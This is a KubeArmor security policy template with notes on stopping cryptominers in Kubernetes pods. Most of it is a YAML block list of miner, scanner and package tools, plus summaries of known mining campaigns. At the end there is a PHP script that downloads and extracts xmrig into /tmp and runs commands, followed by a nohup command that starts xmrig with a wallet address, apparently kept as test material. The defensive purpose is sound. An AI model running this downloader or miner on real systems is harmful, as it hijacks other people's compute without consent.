KubeArmor policy template for preventing crypto miners execution

prevent-crypto-miners.yaml

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: prevent-crypto-miners
spec:
  selector:
    matchLabels:
      app: wordpress
      
  action: Block
  process:
    matchDirectories:
    - dir: /tmp/
      recursive: true
    
    matchPaths:
    # do not allow execution of xmrig (xmrig.com)
    - execname: xmrig
    
    # prevent execution of Dero miner
    - execname: dero
    - execname: dero-miner-linux-amd64
    - execname: dero-wallet-cli-linux-amd64
    - execname: derod-linux-amd64

    # do not allow execution of masscan/zgrab2/nmap used for recon 
    - execname: zgrab2
    - execname: masscan
    - execname: nmap
    
    # do not allow package management tools execution
    - execname: apt
    - execname: apk
    
    # time sync is important for miners. typically ntpdate is used.
    - execname: ntpdate
  
  # Do not allow overwriting system binaries
  file:
    matchDirectories:
    - dir: /usr/local/bin/
      readOnly: true
      recursive: true
    - dir: /sbin/
      readOnly: true
      recursive: true
    - dir: /bin/
      readOnly: true
      recursive: true
    - dir: /usr/bin/
      readOnly: true
      recursive: true
    - dir: /var/local/bin/
      readOnly: true
      recursive: true
    - dir: /boot/
      readOnly: true
      recursive: true
    
  message: cryptominer detected and blocked
  severity: 10
  tags: 
    - cryptominer

Cryptomining prevention

Common Traits among all k8s based crypto miners:

1. Daemonset based mode of deployment. Why daemonsets? Attackers do not want their mining executions to step on each other. By using a daemonset, the attackers ensure that at max one miner pod per node is installed.
2. /tmp/ for miner tools loading/execution. /tmp/ is the folder that is mostly allowed to be written into because most apps write temporary files in there.
3. Network connectivity to send the results. Mining tools need to load ledgers from the Internet and hence require some sort of synchronization.
4. Use of packagement management tools or wget/curl for downloading accessory tooling. Downloading tools dynamically and then executing them is usually the strategy. For downloading, either (or both) existing package mgmt tools or wget/curl are used.
5. Use of a cluster-admin role to spread across.
6. Use of popular mining softwares (xmrig is the most popular) [done]
7. Victims are targeted by their internet accessibility
8. Prevent execution of IRC bots
9. Time synchronization is critical for mining software and attackers use pre-installed tools such as ntpdate for date/time sync. [done]
10. Cryptominers seem to require privileged permissions in some cases.

Dero Miner

Ref: https://thehackernews.com/2023/03/new-cryptojacking-operation-targeting.html
Targeted KubeArmor Policy:

• do not allow execution of binaries {dero-miner-linux-amd64, dero-wallet-cli-linux-amd64, derod-linux-amd64}
• [for ARM platforms] do not allow execution of binaries {dero-miner-linux-arm, dero-wallet-cli-linux-arm, derod-linux-arm}
• do not allow execution of {ntpdate} ... Miners keep your system clock sync with NTP

PwnRig miner

Ref: https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html
Ref: https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/

• Do not allow execution of code from /tmp/ folder
  • PwnRig downloads the malware loader dynamically from the Internet and places it in /tmp/ and executes it from there.
• Do not allow "Tsunami IRC bot"
• Do not allow exeuction of package management tools
  • PwnRig installs masscan dynamically to scan for exposed Docker APIs

TeamTNT SilentBob

Ref: https://thehackernews.com/2023/07/silentbob-campaign-cloud-native.html

• Do not allow exeuction of package management tools
  • PwnRig installs masscan dynamically to scan for exposed Docker APIs
• Do not allow execution of Zgrab scanner (https://github.com/zmap/zgrab2)

KubeArmor Zero Trust Protection:

• Common way to prevent any current and future crypto mining attacks would be to use KubeArmor Zero Trust policies which essentially limits any unauthorized access by network primitives, process-exec primitives, file-access primitives by any unknown binaries.
• Most of the cryptominers deploy binaries in the /tmp/ folder and execute from there.

Approaches taken by others

1. ML based learning approach ... Biggest problem is the deployment and model testing. Also you need to profile the target environment at runtime to provide data for ML and this has huge performance implications.
2. Detection based on filenames

https://gist.githubusercontent.com/achrefbensaad/98d1512a2860bc54e393d9a9c8d00abc/raw/4c64ce76a42899b3e3b6ca3a7b42d4dff842009f/xmrig-downloader.php

; nohup /tmp/xmrig-6.21.1/xmrig 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD

<?php
    // maximum execution time in seconds
    set_time_limit (24 * 60 * 60);

    // folder to save downloaded files to. must end with slash
    $destination_folder = '/tmp/';

    $url = "https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-static-x64.tar.gz";
    $newfname = $destination_folder . basename($url);

    $file = fopen ($url, "rb");
    if ($file) {
      $newf = fopen ($newfname, "wb");

      if ($newf)
      while(!feof($file)) {
        fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
      }
    }

    if ($file) {
      fclose($file);
    }

    if ($newf) {
      fclose($newf);
    }
    $ret = exec('tar xf ' . $newfname.' -C /tmp' , $output, $error);
    // Debug
    var_dump($ret);
    var_dump($output);
    var_dump($error);
    $ret = exec('whoami', $output, $error);
    // Debug
    echo "dddd";
    var_dump($ret);
    var_dump($output);
    var_dump($error);

?>